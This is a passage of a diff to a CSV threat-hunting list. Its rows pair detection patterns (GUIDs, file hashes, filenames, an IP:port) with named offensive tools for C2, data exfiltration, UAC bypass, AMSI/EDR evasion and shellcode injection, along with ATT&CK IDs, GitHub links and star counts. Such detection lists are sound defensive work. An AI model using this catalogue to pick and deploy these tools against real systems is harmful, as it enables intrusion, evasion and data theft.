regsvr32.exe or as a standalone executable.","T1059 - T1218 - T1216 - T1053 - T1118","TA0002 - TA0008 - TA0003","N/A","N/A","Defense Evasion","https://github.com/p3nt4/PowerShdll","1","0","N/A","N/A","10","1649","263","2021-03-17T02:02:23Z","2016-07-15T00:08:32Z" +"*36EBF9AA-2F37-4F1D-A2F1-F2A45DEEAF21*","offensive_tool_keyword","PowerShdll","Run PowerShell with dlls only Does not require access to powershell.exe as it uses powershell automation dlls. PowerShdll can be run with: rundll32.exe. installutil.exe. regsvcs.exe. regasm.exe. regsvr32.exe or as a standalone executable.","T1059 - T1218 - T1216 - T1053 - T1118","TA0002 - TA0008 - TA0003","N/A","N/A","Defense Evasion","https://github.com/p3nt4/PowerShdll","1","0","N/A","N/A","10","1650","263","2021-03-17T02:02:23Z","2016-07-15T00:08:32Z" "*36F9C306-5F45-4946-A259-610C05BD90DF*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "*375D8508-F60D-4E24-9DF6-1E591D2FA474*","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/MzHmO/DebugAmsi","1","0","N/A","10","1","71","17","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z" "*38ea755e162c55ef70f9506dddfd01641fc838926af9c43eda652da63c67058b*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" 
"*3A2FCB56-01A3-41B3-BDAA-B25F45784B23*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" -"*3A2FCB56-01A3-41B3-BDAA-B25F45784B23*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","180","34","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*3A2FCB56-01A3-41B3-BDAA-B25F45784B23*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*3bb553cd-0a48-402d-9812-8daff60ac628*","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","0","N/A","10","2","116","26","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" -"*3BEF8A16-981F-4C65-8AE7-C612B46BE446*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" 
+"*3BEF8A16-981F-4C65-8AE7-C612B46BE446*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*3C601672-7389-42B2-B5C9-059846E1DA88*","offensive_tool_keyword","TakeMyRDP","A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/TheD1rkMtr/TakeMyRDP","1","0","N/A","N/A","3","278","56","2023-08-02T02:23:28Z","2023-07-02T17:25:33Z" "*3ECA4B56CE358B13E1128A1E6149ED07CA0A8C55997B50A1E2C4EA46BD586B84*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","0","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" -"*3f399d7d08d61d4ab7d5188e893b0f2a06b5a5a00f0ce00db2d234463280540c*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*3fa76458e017f2d04544d809a7be81e180c3132ad2254279812e27d5d20ce97e*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" 
-"*3fd21b20d00000021c43d21b21b43d41226dd5dfc615dd4a96265559485910*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"*3f399d7d08d61d4ab7d5188e893b0f2a06b5a5a00f0ce00db2d234463280540c*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*3fa76458e017f2d04544d809a7be81e180c3132ad2254279812e27d5d20ce97e*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*3fd21b20d00000021c43d21b21b43d41226dd5dfc615dd4a96265559485910*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "*3fd21b20d00000021c43d21b21b43de0a012c76cf078b8d06f4620c2286f5e*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and 
Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" -"*3kom-superhack.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*3snake-master*","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","1","N/A","7","7","688","113","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z" +"*3kom-superhack.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*3snake-master*","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","1","N/A","7","7","688","114","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z" "*4.5.6.7:1337*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" -"*40056/service-endpoint*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" 
-"*4006ba7005ca2873a5acbd2755ba1965e62bf0bd8783882f874bea2c80d45e1d*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*40B05F26-6A2F-40BC-88DE-F40D4BC77FB0*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","0","N/A","10","2","173","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" +"*40056/service-endpoint*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*4006ba7005ca2873a5acbd2755ba1965e62bf0bd8783882f874bea2c80d45e1d*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*40B05F26-6A2F-40BC-88DE-F40D4BC77FB0*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","0","N/A","10","2","175","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" "*40E7714F-460D-4CA6-9A5A-FB32C6769BE4*","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace 
Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","N/A","10","1","63","9","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" -"*421ccf38c0f8216c69a74bb9f0ff4a08dae88c02958829c104198b9bca715bcb*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*4390571ef12a934fbfc0191b789a48c8e61f690ba930f4659f3960e4ec22706a*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*43BB3C30-39D7-4B6B-972E-1E2B94D4D53A*","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral movement","https://github.com/DarkCoderSc/SharpShellPipe","1","0","N/A","8","1","97","14","2023-08-27T13:12:39Z","2023-08-25T15:18:30Z" +"*421ccf38c0f8216c69a74bb9f0ff4a08dae88c02958829c104198b9bca715bcb*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*4390571ef12a934fbfc0191b789a48c8e61f690ba930f4659f3960e4ec22706a*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - 
TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*43BB3C30-39D7-4B6B-972E-1E2B94D4D53A*","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral movement","https://github.com/DarkCoderSc/SharpShellPipe","1","0","N/A","8","1","98","14","2023-08-27T13:12:39Z","2023-08-25T15:18:30Z" "*443D8CBF-899C-4C22-B4F6-B7AC202D4E37*","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","0","N/A","9","5","445","95","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z" -"*44626fa65358f14a41bbc8c850b482f61eb64e1e0636df93320d1cca6caa0483*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*4479c31a428b0672245b2eff026be202998a4f146ab90cd06ce44412a20bf462*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*44626fa65358f14a41bbc8c850b482f61eb64e1e0636df93320d1cca6caa0483*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation 
tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*4479c31a428b0672245b2eff026be202998a4f146ab90cd06ce44412a20bf462*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*449CE476-7B27-47F5-B09C-570788A2F261*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" -"*44c2e8c3e25b9d75d319a256eaaca3d195d789209a6491795696b5e33b142513*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*45D748AC-9B16-426E-808D-94662B0417F7*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*46ce4d9e34f8845b17c5a9b87891b5ace6dca83427377029ee1d06af5af6d637*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation 
tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*47c05b996b2831e39c05190b62fb25558a8a05173eb4b5f5b263b841e0bed3f2*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*48da9c5487412fa708a6d7fb753a238a9258fd1bad88d564ad07178d278a7b8d*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*497CA37F-506C-46CD-9B8D-F9BB0DA34B95*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" -"*49d94561eee009acc25c36857bb0260dd8d8a38e6cdf0286a49463d90724b9b1*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*4a548ba1be4de75a03af674d670ff10375700a18babc7cb3a4d1406045e2df04*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - 
TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*4aa24c1115cc3ed71027f760c7564357c162a09de58d75b5e9037cd869fb2a8a*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*4c21f433ebb3a72668a36a707daed37afb5c3ed2402d60b1634a741c36f2ed10*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*4C3B106C-8782-4374-9459-851749072123*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","48","6","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*44c2e8c3e25b9d75d319a256eaaca3d195d789209a6491795696b5e33b142513*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*45D748AC-9B16-426E-808D-94662B0417F7*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation 
tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*46ce4d9e34f8845b17c5a9b87891b5ace6dca83427377029ee1d06af5af6d637*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*47c05b996b2831e39c05190b62fb25558a8a05173eb4b5f5b263b841e0bed3f2*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*48da9c5487412fa708a6d7fb753a238a9258fd1bad88d564ad07178d278a7b8d*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*497CA37F-506C-46CD-9B8D-F9BB0DA34B95*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*49d94561eee009acc25c36857bb0260dd8d8a38e6cdf0286a49463d90724b9b1*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - 
TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*4a548ba1be4de75a03af674d670ff10375700a18babc7cb3a4d1406045e2df04*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*4aa24c1115cc3ed71027f760c7564357c162a09de58d75b5e9037cd869fb2a8a*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*4c21f433ebb3a72668a36a707daed37afb5c3ed2402d60b1634a741c36f2ed10*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*4C3B106C-8782-4374-9459-851749072123*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" "*4C574B86-DC07-47EA-BB02-FD50AE002910*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" "*4cec28b4c00002245dffc8346be0cc11*","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1076 - T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","7","3","298","64","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" -"*4d15af5a22467795c5367c3956746d01424795784f62ca3f30e4619c063338a5*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*4d15af5a22467795c5367c3956746d01424795784f62ca3f30e4619c063338a5*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*4D1B765D-1287-45B1-AEDC-C4B96CF5CAA2*","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + 